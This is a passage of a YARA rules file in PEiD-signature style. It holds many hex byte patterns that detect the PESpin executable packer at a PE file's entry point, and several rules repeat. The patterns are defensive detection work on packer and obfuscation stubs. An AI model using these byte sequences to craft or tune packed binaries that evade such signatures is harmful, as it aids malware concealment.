PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 C8 DC 46 00 0B E4 74 9E 75 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 19 77 00 43 B7 F6 C3 ?? ?? ?? ?? ?? ?? ?? C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 ?? EB FB FF 8B ?? ?? ?? ?? ?? 8B 42 3C 03 C2 89 ?? ?? ?? ?? ?? EB 02 ?? ?? F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
?? ?? ?? ?? FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 ?? ?? ?? ?? 83 04 24 0C C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V01_cyberbob_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 8B ?? ?? ?? ?? ?? 8B 42 3C 03 C2 89 ?? ?? ?? ?? ?? 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 ?? ?? ?? ?? ?? 53 8F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? B9 A5 08 00 00 8D ?? ?? ?? ?? ?? 4F 30 1C 39 FE CB E2 F9 68 2D 01 00 00 59 8D ?? ?? ?? ?? ?? C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 ?? ?? ?? ?? 4F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_13x_Cyberbob_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_01_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_1304_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 AC DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 
F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v11_Cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_03_cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_11_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 C8 DC 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v07_Cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 88 39 40 00 8B 42 3C 03 C2 89 85 92 39 40 00 EB 01 DB 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D A6 39 40 00 53 8F 85 4A 38 40 00 
BB ?? 00 00 00 B9 EC 0A 00 00 8D BD 36 3A 40 00 4F EB 01 AB 30 1C 39 FE CB E2 F9 EB 01 C8 68 CB 00 00 00 59 8D BD 56 44 40 00 E8 03 00 00 00 EB 04 FA EB FB 68 83 04 24 0C C3 8D C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 B3 5F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D 99 39 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESpin_V041_cyberbobnbsp_nbsp_SignByfly_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 02 D2 46 00 0B E4 74 9E 75 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 8B ?? ?? ?? ?? ?? 8B 42 3C 03 C2 89 ?? ?? ?? ?? ?? 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 ?? ?? ?? ?? ?? 53 8F ?? ?? ?? ?? ?? BB ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 4F EB 01 AB 30 1C 39 FE CB E2 F9 EB 01 ?? 68 3C 01 00 00 59 8D ?? ?? ?? ?? ?? C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 ?? ?? ?? ?? 59 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 ?? E8 1A 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v07_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 88 39 40 00 8B 42 3C 03 C2 89 85 92 39 40 00 EB 01 DB 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D A6 39 40 00 53 8F 85 4A 38 40 00 BB ?? 
00 00 00 B9 EC 0A 00 00 8D BD 36 3A 40 00 4F EB 01 AB 30 1C 39 FE CB E2 F9 EB 01 C8 68 CB 00 00 00 59 8D BD 56 44 40 00 E8 03 00 00 00 EB 04 FA EB FB 68 83 04 24 0C C3 8D C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 B3 5F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D 99 39 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V01_cyberbobnbsp_nbsp_SignByfly_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 8B ?? ?? ?? ?? ?? 8B 42 3C 03 C2 89 ?? ?? ?? ?? ?? 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 ?? ?? ?? ?? ?? 53 8F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? B9 A5 08 00 00 8D ?? ?? ?? ?? ?? 4F 30 1C 39 FE CB E2 F9 68 2D 01 00 00 59 8D ?? ?? ?? ?? ?? C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 ?? ?? ?? ?? 
4F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_13beta_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESPin_v13_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 AC DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 AC DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 0D 4F 40 00 8B 42 3C 03 C2 89 85 17 4F 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D 2B 4F 40 00 53 8F 85 21 4D 40 00 EB 07 FA EB 01 FF EB 04 E3 EB F8 69 8B 59 38 03 DA 8B 3B 89 BD D0 4F 40 00 8D 5B 04 8B 1B 89 9D D5 4F 40 00 E8 00 00 00 00 58 01 68 05 68 F7 65 0F E2 B8 77 CE 2F B1 35 73 CE 2F B1 03 E0 F7 D8 81 2C 04 13 37 CF E1 FF 64 24 FC }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESpin_1304_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 
43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_0b_01_CyberBob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_13beta_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V071_cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v11_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 C3 4B 40 00 8B 42 3C 03 C2 89 85 CD 4B 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D E1 4B 40 00 53 8F 85 D7 49 40 00 BB ?? 
00 00 00 B9 FE 11 00 00 8D BD 71 4C 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C C1 2C 24 06 F7 14 24 83 24 24 01 50 52 B8 83 B2 DC 12 05 44 4D 23 ED F7 64 24 08 8D 84 28 BD 2D 40 00 89 44 24 08 5A 58 8D 64 24 04 FF 64 24 FC FF EA EB 01 C8 E8 01 00 00 00 68 58 FE 48 1F 0F 84 94 02 00 00 75 01 9A 81 70 03 E8 98 68 EA 83 C0 21 8? }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESpin_11_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v01_Cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 B3 28 40 00 8B 42 3C 03 C2 89 85 BD 28 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D D1 28 40 00 53 8F 85 C4 27 40 00 BB ?? 00 00 00 B9 A5 08 00 00 8D BD 75 29 40 00 4F 30 1C 39 FE CB E2 F9 68 2D 01 00 00 59 8D BD AA 30 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 07 4F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B8 ?? ?? ?? ?? 
2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D C4 28 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 59 81 C1 1D 00 00 00 52 51 C1 E9 05 23 D1 FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESpin_V03_cyberbob_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 CB 2C 40 00 8B 42 3C 03 C2 89 85 D5 2C 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D E9 2C 40 00 53 8F 85 B6 2B 40 00 BB ?? 00 00 00 B9 75 0A 00 00 8D BD 7E 2D 40 00 4F 30 1C 39 FE CB E2 F9 68 3C 01 00 00 59 8D BD B6 36 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 1F 53 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 
2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D DC 2C 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_07_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESpin_v03_Cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 CB 2C 40 00 8B 42 3C 03 C2 89 85 D5 2C 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D E9 2C 40 00 53 8F 85 B6 2B 40 00 BB ?? 00 00 00 B9 75 0A 00 00 8D BD 7E 2D 40 00 4F 30 1C 39 FE CB E2 F9 68 3C 01 00 00 59 8D BD B6 36 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 1F 53 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 
2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D DC 2C 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v11_Cyberbob_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 C3 4B 40 00 8B 42 3C 03 C2 89 85 CD 4B 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D E1 4B 40 00 53 8F 85 D7 49 40 00 BB ?? 00 00 00 B9 FE 11 00 00 8D BD 71 4C 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C C1 2C 24 06 F7 14 24 83 24 24 01 50 52 B8 83 B2 DC 12 05 44 4D 23 ED F7 64 24 08 8D 84 28 BD 2D 40 00 89 44 24 08 5A 58 8D 64 24 04 FF 64 24 FC FF EA EB 01 C8 E8 01 00 00 00 68 58 FE 48 1F 0F 84 94 02 00 00 75 01 9A 81 70 03 E8 98 68 EA 83 C0 21 8? }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V1304_cyberbob_20080310: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 ?? EB 01 ?? EB 0D ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 ?? EB FB ?? ?? ?? ?? ?? ?? ?? 8B 42 3C 03 C2 ?? ?? ?? ?? ?? ?? EB 02 ?? ?? F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 ?? ?? ?? ?? EB 06 ?? ?? ?? ?? ?? ?? 
F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_10_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v11_by_cyberbob_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 C3 4B 40 00 8B 42 3C 03 C2 89 85 CD 4B 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D E1 4B 40 00 53 8F 85 D7 49 40 00 BB ?? 00 00 00 B9 FE 11 00 00 8D BD 71 4C 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v03_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 